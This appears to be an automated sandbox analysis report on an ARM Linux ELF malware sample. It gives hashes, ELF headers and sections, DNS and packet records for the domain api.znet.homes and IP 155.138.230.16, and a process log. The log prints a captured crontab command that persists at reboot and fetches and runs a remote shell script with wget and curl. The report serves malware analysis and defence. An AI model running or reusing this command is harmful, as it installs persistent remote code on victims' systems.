                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):57
                Entropy (8bit):3.057495434222918
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNf:EfXTf
                MD5:72F337DBCA7B90E321DB5097C491B778
                SHA1:BD7C8BBE6C47A4FB29EE7599877529D554C38A39
                SHA-256:B24BCE5ACA5EB5B36D83D58C4308ABDC64B899D140CF798160675E96F9356032
                SHA-512:09D237D95A145CE56825EE0824FBB88D6B30DC06C56AB27AFE7657777700D5853728C6E2690370475AAA81476FA190F6CDAE119776FAF8C1D0798B5F859BC81F
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/armv6l.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):116
                Entropy (8bit):2.6979671700322143
                Encrypted:false
                SSDEEP:3:E66RIVKE+xNTUdVvX:EfXTYdVf
                MD5:298D5EC1C991D329413C4F0688154BBA
                SHA1:1A5A421E4C7261C04A5A57C85F5772F8EA4E3972
                SHA-256:FD541B1835814825DF5AE215CAFDDAD07C6F8245DA230E88C7D1338F4E923A62
                SHA-512:3AD5FC9EACDCFF093589F5EB312E67F08CF3CA9289E91E05246273FA9B8A1D122F46E80126EA1C6C8BD5EF30213987736B9C1983EDB0CDC13ACB534AE9A9011D
                Malicious:false
                Preview:5449 (/tmp/armv6l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.133542203029563
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:armv6l.elf
                File size:87'024 bytes
                MD5:ea5f8b9926aee8b1547ebfb0fab259d3
                SHA1:31f27c1784bba4550b8e4bcf3531de59653ddafe
                SHA256:b75f76b138d62714efd89411f98f943952056da3635a32d30443730c0df87fea
                SHA512:82f9a51eddec63ef2dc61945ad066e62daf64518fbddda4d7d3f6c91353e4383609c1a5891678fad782ff4beb4172b5ae8cf23bab8f79ea5817f055921425c02
                SSDEEP:1536:aonB6NBlNdxzwGjef1+KUs+b8aWSsV97MXitHeb95PYoar:eNJAff+b8aWVHeb9tDar
                TLSH:DB831C47B9818E12C5C212BAFAAE418933137F78D3EE7212CD20AF9077865DB0D77616
                File Content Preview:.ELF..............(.....T...4....Q......4. ...(.....................H;..H;...............@...@...@.. ...Xi..........Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../. C.......@....-.@0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x8154
                Flags:0x4000002
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:86424
                Section Header Size:40
                Number of Section Headers:15
                Header String Table Index:14
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80940x940x100x00x6AX004
                .textPROGBITS0x80b00xb00x122f40x00x6AX0016
                .finiPROGBITS0x1a3a40x123a40x100x00x6AX004
                .rodataPROGBITS0x1a3b80x123b80x17900x00x2A008
                .eh_framePROGBITS0x240000x140000x40x00x3WA004
                .init_arrayINIT_ARRAY0x240040x140040x40x00x3WA004
                .fini_arrayFINI_ARRAY0x240080x140080x40x00x3WA004
                .jcrPROGBITS0x2400c0x1400c0x40x00x3WA004
                .gotPROGBITS0x240100x140100x780x40x3WA004
                .dataPROGBITS0x240880x140880x2980x00x3WA004
                .bssNOBITS0x243200x143200x66380x00x3WA004
                .commentPROGBITS0x00x143200xdf00x00x0001
                .ARM.attributesARM_ATTRIBUTES0x00x151100x100x00x0001
                .shstrtabSTRTAB0x00x151200x750x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80000x80000x13b480x13b486.14660x5R E0x8000.init .text .fini .rodata
                LOAD0x140000x240000x240000x3200x69583.99970x6RW 0x8000.eh_frame .init_array .fini_array .jcr .got .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                Download Network PCAP: filteredfull

                • Total Packets: 22
                • 1290 undefined
                • 80 (HTTP)
                • 53 (DNS)
                TimestampSource PortDest PortSource IPDest IP
                Mar 23, 2025 23:04:15.450368881 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:16.102181911 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:16.463649035 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:17.103627920 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:18.479604959 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:19.119606972 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:22.543576002 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:23.311558962 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:30.735544920 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:31.503485918 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:46.863321066 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:04:47.631328106 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:20.655028105 CET499501290192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:20.655033112 CET4550280192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:30.585247993 CET499541290192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:31.598920107 CET499541290192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:33.614897966 CET499541290192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:37.806864023 CET499541290192.168.2.13155.138.230.16
                Mar 23, 2025 23:05:45.998922110 CET499541290192.168.2.13155.138.230.16
                Mar 23, 2025 23:06:02.126686096 CET499541290192.168.2.13155.138.230.16
                TimestampSource PortDest PortSource IPDest IP
                Mar 23, 2025 23:04:15.323213100 CET4696653192.168.2.131.1.1.1
                Mar 23, 2025 23:04:15.447680950 CET53469661.1.1.1192.168.2.13
                Mar 23, 2025 23:05:30.482906103 CET4744353192.168.2.131.1.1.1
                Mar 23, 2025 23:05:30.584235907 CET53474431.1.1.1192.168.2.13
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 23, 2025 23:04:15.323213100 CET192.168.2.131.1.1.10x8fc7Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                Mar 23, 2025 23:05:30.482906103 CET192.168.2.131.1.1.10xc6b2Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 23, 2025 23:04:15.447680950 CET1.1.1.1192.168.2.130x8fc7No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                Mar 23, 2025 23:05:30.584235907 CET1.1.1.1192.168.2.130xc6b2No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false

                System Behavior

                Start time (UTC):22:04:09
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:/tmp/armv6l.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:09
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:09
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/tmp/armv6l.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/usr/bin/crontab
                Arguments:crontab -l
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/usr/bin/chmod
                Arguments:chmod +x bins.sh
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/usr/bin/sh
                Arguments:sh bins.sh
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/curl
                Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                File size:239848 bytes
                MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:04:14
                Start date (UTC):23/03/2025
                Path:/usr/bin/crontab
                Arguments:crontab -
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5